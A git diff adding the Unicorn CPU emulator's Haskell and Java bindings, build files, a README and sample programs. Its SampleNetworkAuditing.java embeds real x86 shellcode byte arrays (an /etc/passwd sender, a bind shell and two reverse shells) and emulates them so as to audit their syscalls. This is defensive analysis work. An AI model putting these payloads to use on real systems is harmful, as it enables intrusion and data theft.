+ , `Int' + , combineEnums `[MemoryPermission]' + } -> `Error' +#} + +{# fun uc_mem_unmap as ^ + { `Engine' + , `Word64' + , `Int' + } -> `Error' +#} + +{# fun uc_mem_protect as ^ + { `Engine' + , `Word64' + , `Int' + , combineEnums `[MemoryPermission]' + } -> `Error' +#} + +{# fun uc_mem_regions as ^ + { `Engine' + , alloca- `MemoryRegionPtr' peek* + , alloca- `Int' castPtrAndPeek* + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Context +------------------------------------------------------------------------------- + +{# fun uc_context_alloc as ^ + { `Engine' + , alloca- `ContextPtr' peek* + } -> `Error' +#} + +{# fun uc_context_save as ^ + { `Engine' + , `Context' + } -> `Error' +#} + +{# fun uc_context_restore as ^ + { `Engine' + , `Context' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Misc. +------------------------------------------------------------------------------- + +{# fun pure unsafe uc_version as ^ + { id `Ptr CUInt' + , id `Ptr CUInt' + } -> `Int' +#} + +{# fun unsafe uc_errno as ^ + { `Engine' + } -> `Error' +#} + +{# fun pure unsafe uc_strerror as ^ + { `Error' + } -> `String' +#} + +------------------------------------------------------------------------------- +-- Helper functions +------------------------------------------------------------------------------- + +expandMemPerms :: (Integral a, Bits a) + => a + -> [MemoryPermission] +expandMemPerms perms = + -- Only interested in the 3 least-significant bits + let maskedPerms = fromIntegral $ perms .&. 0x7 in + if maskedPerms == 0x0 then + [ProtNone] + else if maskedPerms == 0x7 then + [ProtAll] + else + checkRWE maskedPerms [ProtRead, ProtWrite, ProtExec] + where + checkRWE p (x:xs) = + if p .&. (fromEnum x) /= 0 then + x : checkRWE p xs + else + checkRWE p xs + checkRWE _ [] = + [] + +withIntegral :: (Integral a, Num b, Storable b) + => a + -> (Ptr b -> IO c) + -> IO c +withIntegral = + with . fromIntegral + +withByteStringLen :: Integral a + => ByteString + -> ((Ptr (), a) -> IO b) + -> IO b +withByteStringLen bs f = + useAsCStringLen bs $ \(ptr, len) -> f (castPtr ptr, fromIntegral len) + +withEnums :: Enum a + => [a] + -> (Ptr b -> IO c) + -> IO c +withEnums l f = + let ints :: [CInt] = map enumToNum l in + withArray ints $ \ptr -> f (castPtr ptr) + +integralListToArray :: (Integral a, Storable b, Num b) + => [a] + -> (Ptr b -> IO c) + -> IO c +integralListToArray l f = + let l' = map fromIntegral l in + withArray l' $ \array -> f array diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Util.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Util.hs new file mode 100644 index 0000000..edaf343 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Util.hs @@ -0,0 +1,31 @@ +{-| +Module : Unicorn.Internal.Util +Description : Utility (aka helper) functions for the Unicorn emulator. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 +-} +module Unicorn.Internal.Util where + +import Data.Bits +import Foreign + +-- | Combine a list of Enums by performing a bitwise-OR. +combineEnums :: (Enum a, Num b, Bits b) + => [a] + -> b +combineEnums = + foldr ((.|.) <$> enumToNum) 0 + +-- | Cast a pointer and then peek inside it. +castPtrAndPeek :: Storable a + => Ptr b + -> IO a +castPtrAndPeek = + peek . castPtr + +-- | Convert an 'Eum' to a 'Num'. +enumToNum :: (Enum a, Num b) + => a + -> b +enumToNum = + fromIntegral . fromEnum diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/cbits/unicorn_wrapper.c b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/cbits/unicorn_wrapper.c new file mode 100644 index 0000000..878518e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/cbits/unicorn_wrapper.c @@ -0,0 +1,50 @@ +#include + +#include "unicorn_wrapper.h" + +void uc_close_wrapper(uc_engine *uc) { + uc_close(uc); +} + +void uc_close_dummy(uc_engine *uc) { +} + +uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value) { + return uc_reg_write(uc, regid, (const void*) value); +} + +uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value) { + return uc_reg_read(uc, regid, (void*) value); +} + +uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { + void **valsPtr = malloc(sizeof(void*) * count); + int i; + + for (i = 0; i < count; ++i) { + valsPtr[i] = (void*) &vals[i]; + } + + uc_err ret = uc_reg_write_batch(uc, regs, (void *const*) valsPtr, count); + free(valsPtr); + + return ret; +} + +uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { + void **valsPtr = malloc(sizeof(void*) * count); + int i; + + for (i = 0; i < count; ++i) { + valsPtr[i] = (void*) &vals[i]; + } + + uc_err ret = uc_reg_read_batch(uc, regs, valsPtr, count); + free(valsPtr); + + return ret; +} + +void uc_free_wrapper(void *mem) { + uc_free(mem); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/include/unicorn_wrapper.h b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/include/unicorn_wrapper.h new file mode 100644 index 0000000..3175716 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/include/unicorn_wrapper.h @@ -0,0 +1,30 @@ +#ifndef UNICORN_WRAPPER_H +#define UNICORN_WRAPPER_H + +#include +#include + +/* + * Wrap Unicorn's uc_close function and ignore the returned error code. + */ +void uc_close_wrapper(uc_engine *uc); + +/* + * Doesn't actually do anything. + */ +void uc_close_dummy(uc_engine *uc); + +/* + * Wrappers for register read/write functions that accept int64_t pointers. + */ +uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value); +uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value); +uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); +uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); + +/* + * Wrap Unicorn's uc_free function and ignore the returned error code. + */ +void uc_free_wrapper(void *context); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/unicorn.cabal b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/unicorn.cabal new file mode 100644 index 0000000..a16ffe6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/unicorn.cabal @@ -0,0 +1,42 @@ +-- Initial unicorn.cabal generated by cabal init. For further +-- documentation, see http://haskell.org/cabal/users-guide/ + +name: unicorn +version: 0.1.0.0 +category: FFI, Emulation +synopsis: Unicorn CPU emulator engine +description: Haskell bindings for the Unicorn CPU emulator engine. +homepage: https://github.com/unicorn-engine/unicorn +author: Adrian Herrera +license: GPL +copyright: (c) 2016, Adrian Herrera +category: System +build-type: Simple +stability: experimental +cabal-version: >= 1.10 +extra-source-files: cbits/ + , include/ + +library + exposed-modules: Unicorn.Internal.Core + Unicorn.Internal.Unicorn + Unicorn.CPU.Arm64 + Unicorn.CPU.Arm + Unicorn.CPU.M68k + Unicorn.CPU.Mips + Unicorn.CPU.Sparc + Unicorn.CPU.X86 + Unicorn.Internal.Hook + Unicorn.Hook + Unicorn + other-modules: Unicorn.Internal.Util + build-depends: base >=4 && <5 + , bytestring >= 0.9.1 + , transformers < 0.6 + hs-source-dirs: src + c-sources: src/cbits/unicorn_wrapper.c + include-dirs: src/include + build-tools: c2hs + pkgconfig-depends: unicorn + default-language: Haskell2010 + ghc-options: -Wall diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile new file mode 100644 index 0000000..73d2072 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile @@ -0,0 +1,29 @@ +.PHONY: gen_const clean jar all lib samples install + +all: gen_const + $(MAKE) -f Makefile.build all + +lib: + $(MAKE) -f Makefile.build lib + +samples: + $(MAKE) -f Makefile.build samples + +jar: + $(MAKE) -f Makefile.build jar + +install: lib jar + $(MAKE) -f Makefile.build install + +uninstall: + $(MAKE) -f Makefile.build uninstall + +gen_const: + cd .. && python const_generator.py java + +clean: + rm -f unicorn/*.class + rm -f samples/*.class + rm -f *.so + rm -f *.dylib + rm -f *.dll diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile.build b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile.build new file mode 100644 index 0000000..2aaf511 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile.build @@ -0,0 +1,81 @@ + +.PHONY: gen_const clean + +JAVA_HOME := $(shell jrunscript -e 'java.lang.System.out.println(java.lang.System.getProperty("java.home"));') + +JAVA_INC := $(shell realpath $(JAVA_HOME)/include) + +JAVA_PLATFORM_INC := $(shell dirname `find $(JAVA_INC) -name jni_md.h`) + +UNICORN_INC=../../include + +SAMPLES := $(shell ls samples/*.java) +SRC := $(shell ls unicorn/*.java) + +OS := $(shell uname) +ifeq ($(OS),Darwin) + LIB_EXT=.dylib +else ifeq ($(OS),Linux) + LIB_EXT=.so +else + LIB_EXT=.dll +endif + +CC=gcc +CFLAGS=-fPIC +LDFLAGS=-shared -fPIC +LIBS=-lunicorn +LIBDIR=-L../../ +INCS=-I$(JAVA_INC) -I$(JAVA_PLATFORM_INC) -I$(UNICORN_INC) + +JC=javac +CLASSPATH=./ + +.SUFFIXES: .java .class + +%.class: %.java + $(JC) $(JFLAGS) $< + +OBJS=unicorn_Unicorn.o + +JARFILE=unicorn.jar + +all: lib jar samples + +%.o: %.c + $(CC) -c $(CFLAGS) $(INCS) $< -o $@ + +unicorn_Unicorn.h: unicorn/Unicorn.java + javah unicorn.Unicorn + +unicorn_Unicorn.o: unicorn_Unicorn.c unicorn_Unicorn.h + $(CC) -c $(CFLAGS) $(INCS) $< -o $@ + +libunicorn_java$(LIB_EXT): unicorn_Unicorn.o + +lib: libunicorn_java$(LIB_EXT) unicorn_Unicorn.h + $(CC) -o $< $(LDFLAGS) $(OBJS) $(LIBDIR) $(LIBS) + +samples: $(SAMPLES:.java=.class) +jarfiles: $(SRC:.java=.class) + +jar: jarfiles + jar cf $(JARFILE) unicorn/*.class + +install: lib jar + cp libunicorn_java$(LIB_EXT) $(JAVA_HOME)/lib/ext + cp $(JARFILE) $(JAVA_HOME)/lib/ext + +uninstall: + rm $(JAVA_HOME)/lib/ext/libunicorn_java$(LIB_EXT) + rm $(JAVA_HOME)/lib/ext/$(JARFILE) + +gen_const: + cd .. && python const_generator.py java + +clean: + rm unicorn/*.class + rm samples/*.class + rm *.so + rm *.dylib + rm *.dll diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/README.TXT b/ai_anti_malware/unicorn/unicorn-master/bindings/java/README.TXT new file mode 100644 index 0000000..471adb1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/README.TXT @@ -0,0 +1,37 @@ +This documentation explains how to install the Java binding for Unicorn +from source. + +0. Install the core engine as dependency + + Follow README in the root directory to compile & install the core. + + On *nix, this can simply done by: + + $ sudo ./make.sh install + + +1. Install a JDK for your platform. When done, make sure the JDK tools + are in your PATH. + +2. Change directories into the java bindings, build and install + + $ cd bindings/java + $ make + $ sudo make install + $ make samples + +The samples directory contains some sample code to show how to use Unicorn API. + +- Sample_.java + These show how to access architecture-specific information for each + architecture. + +- Shellcode.java + This shows how to analyze a Linux shellcode. + +- SampleNetworkAuditing.java + Unicorn sample for auditing network connection and file handling in shellcode. + +To uninstall Java binding for Unicorn: + + $ sudo make uninstall diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/SampleNetworkAuditing.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/SampleNetworkAuditing.java new file mode 100644 index 0000000..929ceb9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/SampleNetworkAuditing.java @@ -0,0 +1,429 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* + Unicorn sample for auditing network connection and file handling in shellcode. + Nguyen Tan Cong +*/ + +import unicorn.*; +import java.util.*; + + +public class SampleNetworkAuditing { + + public static int next_id = 3; + public static final int SIZE_REG = 4; + + private static LogChain fd_chains = new LogChain(); + + public static int get_id() { + return next_id++; + } + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + + private static class MyInterruptHook implements InterruptHook { + // callback for tracing Linux interrupt + public void hook(Unicorn uc, int intno, Object user) { +// System.err.println(String.format("Interrupt 0x%x, from Unicorn 0x%x", intno, u.hashCode())); + + // only handle Linux syscall + if (intno != 0x80) { + return; + } + Long eax = (Long)uc.reg_read(Unicorn.UC_X86_REG_EAX); + Long ebx = (Long)uc.reg_read(Unicorn.UC_X86_REG_EBX); + Long ecx = (Long)uc.reg_read(Unicorn.UC_X86_REG_ECX); + Long edx = (Long)uc.reg_read(Unicorn.UC_X86_REG_EDX); + Long eip = (Long)uc.reg_read(Unicorn.UC_X86_REG_EIP); + + // System.out.printf(">>> INTERRUPT %d\n", toInt(eax)); + + if (eax == 1) { // sys_exit + System.out.printf(">>> SYS_EXIT\n"); + uc.emu_stop(); + } + else if (eax == 3) { // sys_read + long fd = ebx; + long buf = ecx; + long count = edx; + + String uuid = UUID.randomUUID().toString().substring(0, 32); + + byte[] dummy_content = Arrays.copyOfRange(uuid.getBytes(), 0, (int)Math.min(count, uuid.length())); + uc.mem_write(buf, dummy_content); + + String msg = String.format("read %d bytes from fd(%d) with dummy_content(%s)", count, fd, uuid.substring(0, dummy_content.length)); + + fd_chains.add_log(fd, msg); + System.out.printf(">>> %s\n", msg); + } + else if (eax == 4) { // sys_write + long fd = ebx; + long buf = ecx; + long count = edx; + + byte[] content = uc.mem_read(buf, count); + + String msg = String.format("write data=%s count=%d to fd(%d)", new String(content), count, fd); + + System.out.printf(">>> %s\n", msg); + fd_chains.add_log(fd, msg); + } + else if (eax == 5) { // sys_open + long filename_addr = ebx; + long flags = ecx; + long mode = edx; + String filename = read_string(uc, filename_addr); + + Long dummy_fd = new Long(get_id()); + uc.reg_write(Unicorn.UC_X86_REG_EAX, dummy_fd); + + String msg = String.format("open file (filename=%s flags=%d mode=%d) with fd(%d)", filename, flags, mode, dummy_fd); + + fd_chains.create_chain(dummy_fd); + fd_chains.add_log(dummy_fd, msg); + System.out.printf(">>> %s\n", msg); + } + else if (eax == 11) { // sys_execv + // System.out.printf(">>> ebx=0x%x, ecx=0x%x, edx=0x%x\n", ebx, ecx, edx)); + String filename = read_string(uc, ebx); + + System.out.printf(">>> SYS_EXECV filename=%s\n", filename); + } + else if (eax == 63) { // sys_dup2 + fd_chains.link_fd(ecx, ebx); + System.out.printf(">>> SYS_DUP2 oldfd=%d newfd=%d\n", ebx, ecx); + } + else if (eax == 102) { // sys_socketcall + // ref: http://www.skyfree.org/linux/kernel_network/socket.html + Long call = (Long)uc.reg_read(Unicorn.UC_X86_REG_EBX); + Long args = (Long)uc.reg_read(Unicorn.UC_X86_REG_ECX); + + // int sys_socketcall(int call, unsigned long *args) + if (call == 1) { // sys_socket + // err = sys_socket(a0,a1,a[2]) + // int sys_socket(int family, int type, int protocol) + long family = toInt(uc.mem_read(args, SIZE_REG)); + long sock_type = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long protocol = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + Long dummy_fd = new Long(get_id()); + uc.reg_write(Unicorn.UC_X86_REG_EAX, dummy_fd.intValue()); + + if (family == 2) { // AF_INET + String msg = String.format("create socket (%s, %s) with fd(%d)", ADDR_FAMILY.get(family), SOCKET_TYPES.get(sock_type), dummy_fd); + fd_chains.create_chain(dummy_fd); + fd_chains.add_log(dummy_fd, msg); + print_sockcall(msg); + } + else if (family == 3) { // AF_INET6 + } + } + else if (call == 2) { // sys_bind + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long umyaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + byte[] sock_addr = uc.mem_read(umyaddr, addrlen); + + String msg = String.format("fd(%d) bind to %s", fd, parse_sock_address(sock_addr)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 3) { // sys_connect + // err = sys_connect(a0, (struct sockaddr *)a1, a[2]) + // int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long uservaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + byte[] sock_addr = uc.mem_read(uservaddr, addrlen); + String msg = String.format("fd(%d) connect to %s", fd, parse_sock_address(sock_addr)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 4) { // sys_listen + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long backlog = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + + String msg = String.format("fd(%d) listened with backlog=%d", fd, backlog); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 5) { // sys_accept + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long upeer_sockaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long upeer_addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + // System.out.printf(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d\n" % (upeer_sockaddr, upeer_addrlen)) + + if (upeer_sockaddr == 0x0) { + print_sockcall(String.format("fd(%d) accept client", fd)); + } + else { + long upeer_len = toInt(uc.mem_read(upeer_addrlen, 4)); + + byte[] sock_addr = uc.mem_read(upeer_sockaddr, upeer_len); + + String msg = String.format("fd(%d) accept client with upeer=%s", fd, parse_sock_address(sock_addr)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + } + else if (call == 9) { // sys_send + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long buff = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long length = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); + + byte[] buf = uc.mem_read(buff, length); + String msg = String.format("fd(%d) send data=%s", fd, new String(buf)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 11) { // sys_receive + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long ubuf = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long size = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); + + String msg = String.format("fd(%d) is gonna receive data with size=%d flags=%d", fd, size, flags); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 13) { // sys_shutdown + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long how = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + + String msg = String.format("fd(%d) is shutted down because of %d", fd, how); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + } + } + } + + public static final Hashtable SOCKET_TYPES; + public static final Hashtable ADDR_FAMILY; + static { + SOCKET_TYPES = new Hashtable(); + ADDR_FAMILY = new Hashtable(); + SOCKET_TYPES.put(1L, "SOCK_STREAM"); + SOCKET_TYPES.put(2L, "SOCK_DGRAM"); + SOCKET_TYPES.put(3L, "SOCK_RAW"); + SOCKET_TYPES.put(4L, "SOCK_RDM"); + SOCKET_TYPES.put(5L, "SOCK_SEQPACKET"); + SOCKET_TYPES.put(10L, "SOCK_PACKET"); + + ADDR_FAMILY.put(0L, "AF_UNSPEC"); + ADDR_FAMILY.put(1L, "AF_UNIX"); + ADDR_FAMILY.put(2L, "AF_INET"); + ADDR_FAMILY.put(3L, "AF_AX25"); + ADDR_FAMILY.put(4L, "AF_IPX"); + ADDR_FAMILY.put(5L, "AF_APPLETALK"); + ADDR_FAMILY.put(6L, "AF_NETROM"); + ADDR_FAMILY.put(7L, "AF_BRIDGE"); + ADDR_FAMILY.put(8L, "AF_AAL5"); + ADDR_FAMILY.put(9L, "AF_X25"); + ADDR_FAMILY.put(10L, "AF_INET6"); + ADDR_FAMILY.put(12L, "AF_MAX"); + } + +// http://shell-storm.org/shellcode/files/shellcode-861.php + public static final byte[] X86_SEND_ETCPASSWD = {106,102,88,49,-37,67,49,-46,82,106,1,106,2,-119,-31,-51,-128,-119,-58,106,102,88,67,104,127,1,1,1,102,104,48,57,102,83,-119,-31,106,16,81,86,-119,-31,67,-51,-128,-119,-58,106,1,89,-80,63,-51,-128,-21,39,106,5,88,91,49,-55,-51,-128,-119,-61,-80,3,-119,-25,-119,-7,49,-46,-74,-1,-78,-1,-51,-128,-119,-62,106,4,88,-77,1,-51,-128,106,1,88,67,-51,-128,-24,-44,-1,-1,-1,47,101,116,99,47,112,97,115,115,119,100}; +// http://shell-storm.org/shellcode/files/shellcode-882.php + public static final byte[] X86_BIND_TCP = {106,102,88,106,1,91,49,-10,86,83,106,2,-119,-31,-51,-128,95,-105,-109,-80,102,86,102,104,5,57,102,83,-119,-31,106,16,81,87,-119,-31,-51,-128,-80,102,-77,4,86,87,-119,-31,-51,-128,-80,102,67,86,86,87,-119,-31,-51,-128,89,89,-79,2,-109,-80,63,-51,-128,73,121,-7,-80,11,104,47,47,115,104,104,47,98,105,110,-119,-29,65,-119,-54,-51,-128}; +// http://shell-storm.org/shellcode/files/shellcode-883.php + public static final byte[] X86_REVERSE_TCP = {106,102,88,106,1,91,49,-46,82,83,106,2,-119,-31,-51,-128,-110,-80,102,104,127,1,1,1,102,104,5,57,67,102,83,-119,-31,106,16,81,82,-119,-31,67,-51,-128,106,2,89,-121,-38,-80,63,-51,-128,73,121,-7,-80,11,65,-119,-54,82,104,47,47,115,104,104,47,98,105,110,-119,-29,-51,-128}; +// http://shell-storm.org/shellcode/files/shellcode-849.php + public static final byte[] X86_REVERSE_TCP_2 = {49,-64,49,-37,49,-55,49,-46,-80,102,-77,1,81,106,6,106,1,106,2,-119,-31,-51,-128,-119,-58,-80,102,49,-37,-77,2,104,-64,-88,1,10,102,104,122,105,102,83,-2,-61,-119,-31,106,16,81,86,-119,-31,-51,-128,49,-55,-79,3,-2,-55,-80,63,-51,-128,117,-8,49,-64,82,104,110,47,115,104,104,47,47,98,105,-119,-29,82,83,-119,-31,82,-119,-30,-80,11,-51,-128}; + + // memory address where emulation starts + public static final int ADDRESS = 0x1000000; + + public static String join(ArrayList l, String sep) { + boolean first = true; + StringBuilder res = new StringBuilder(); + for (String s : l) { + if (!first) { + res.append(sep); + } + res.append(s); + first = false; + } + return res.toString(); + } + + private static class LogChain { + public Hashtable> __chains = new Hashtable>(); + public Hashtable> __linking_fds = new Hashtable>(); + + public void clean() { + __chains.clear(); + __linking_fds.clear(); + } + + public void create_chain(long id) { + if (!__chains.containsKey(id)) { + __chains.put(id, new ArrayList()); + } + else { + System.out.printf("LogChain: id %d existed\n", id); + } + } + + public void add_log(long id, String msg) { + long fd = get_original_fd(id); + + if (fd != -1) { + __chains.get(fd).add(msg); + } + else { + System.out.printf("LogChain: id %d doesn't exist\n", id); + } + } + + public void link_fd(long from_fd, long to_fd) { + if (!__linking_fds.containsKey(to_fd)) { + __linking_fds.put(to_fd, new ArrayList()); + } + + __linking_fds.get(to_fd).add(from_fd); + } + + public long get_original_fd(long fd) { + if (__chains.containsKey(fd)) { + return fd; + } + + for (Long orig_fd : __linking_fds.keySet()) { + if (__linking_fds.get(orig_fd).contains(fd)) + return orig_fd; + } + return -1; + } + + public void print_report() { + System.out.printf("\n----------------"); + System.out.printf("\n| START REPORT |"); + System.out.printf("\n----------------\n\n"); + for (Long fd : __chains.keySet()) { + System.out.printf("---- START FD(%d) ----\n", fd); + System.out.println(join(__chains.get(fd), "\n")); + System.out.printf("---- END FD(%d) ----\n", fd); + } + System.out.printf("\n--------------"); + System.out.printf("\n| END REPORT |"); + System.out.printf("\n--------------\n\n"); + } + } + // end supported classes + + // utilities + static String read_string(Unicorn uc, long addr) { + StringBuilder ret = new StringBuilder(); + char c; + do { + c = (char)(uc.mem_read(addr++, 1)[0] & 0xff); + if (c != 0) { + ret.append(c); + } + } while (c != 0); + + return ret.toString(); + } + + static String parse_sock_address(byte[] sock_addr) { + int sin_family = ((sock_addr[0] & 0xff) + (sock_addr[1] << 8)) & 0xffff; + + if (sin_family == 2) { // AF_INET + int sin_port = ((sock_addr[3] & 0xff) + (sock_addr[2] << 8)) & 0xffff; + return String.format("%d.%d.%d.%d:%d", sock_addr[4] & 0xff, sock_addr[5] & 0xff, sock_addr[6] & 0xff, sock_addr[7] & 0xff, sin_port); + } + else if (sin_family == 6) // AF_INET6 + return ""; + return null; + } + + static void print_sockcall(String msg) { + System.out.printf(">>> SOCKCALL %s\n", msg); + } + // end utilities + + static void test_i386(byte[] code) { + fd_chains.clean(); + System.out.printf("Emulate i386 code\n"); + try { + // Initialize emulator in X86-32bit mode + Unicorn mu = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + mu.mem_write(ADDRESS, code); + + // initialize stack + mu.reg_write(Unicorn.UC_X86_REG_ESP, new Long(ADDRESS + 0x200000)); + + // handle interrupt ourself + mu.hook_add(new MyInterruptHook(), null); + + // emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + code.length, 0, 0); + + // now print out some registers + System.out.printf(">>> Emulation done\n"); + + } catch (UnicornException uex) { + System.out.printf("ERROR: %s\n", uex.getMessage()); + } + + fd_chains.print_report(); + } + + public static void main(String args[]) { + test_i386(X86_SEND_ETCPASSWD); + test_i386(X86_BIND_TCP); + test_i386(X86_REVERSE_TCP); + test_i386(X86_REVERSE_TCP_2); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm.java new file mode 100644 index 0000000..a4bd195 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm.java @@ -0,0 +1,130 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate ARM code */ + +import unicorn.*; + +public class Sample_arm { + + // code to be emulated + public static final byte[] ARM_CODE = {55,0,(byte)0xa0,(byte)0xe3,3,16,66,(byte)0xe0}; // mov r0, #0x37; sub r1, r2, r3 + public static final byte[] THUMB_CODE = {(byte)0x83, (byte)0xb0}; // sub sp, #0xc + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) + { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_arm() + { + + Long r0 = new Long(0x1234); // R0 register + Long r2 = new Long(0x6789); // R1 register + Long r3 = new Long(0x3333); // R2 register + Long r1; // R1 register + + System.out.print("Emulate ARM code\n"); + + // Initialize emulator in ARM mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, ARM_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_ARM_REG_R0, r0); + u.reg_write(Unicorn.UC_ARM_REG_R2, r2); + u.reg_write(Unicorn.UC_ARM_REG_R3, r3); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r0 = (Long)u.reg_read(Unicorn.UC_ARM_REG_R0); + r1 = (Long)u.reg_read(Unicorn.UC_ARM_REG_R1); + System.out.print(String.format(">>> R0 = 0x%x\n", r0.intValue())); + System.out.print(String.format(">>> R1 = 0x%x\n", r1.intValue())); + + u.close(); + } + + static void test_thumb() + { + + Long sp = new Long(0x1234); // R0 register + + System.out.print("Emulate THUMB code\n"); + + // Initialize emulator in ARM mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, 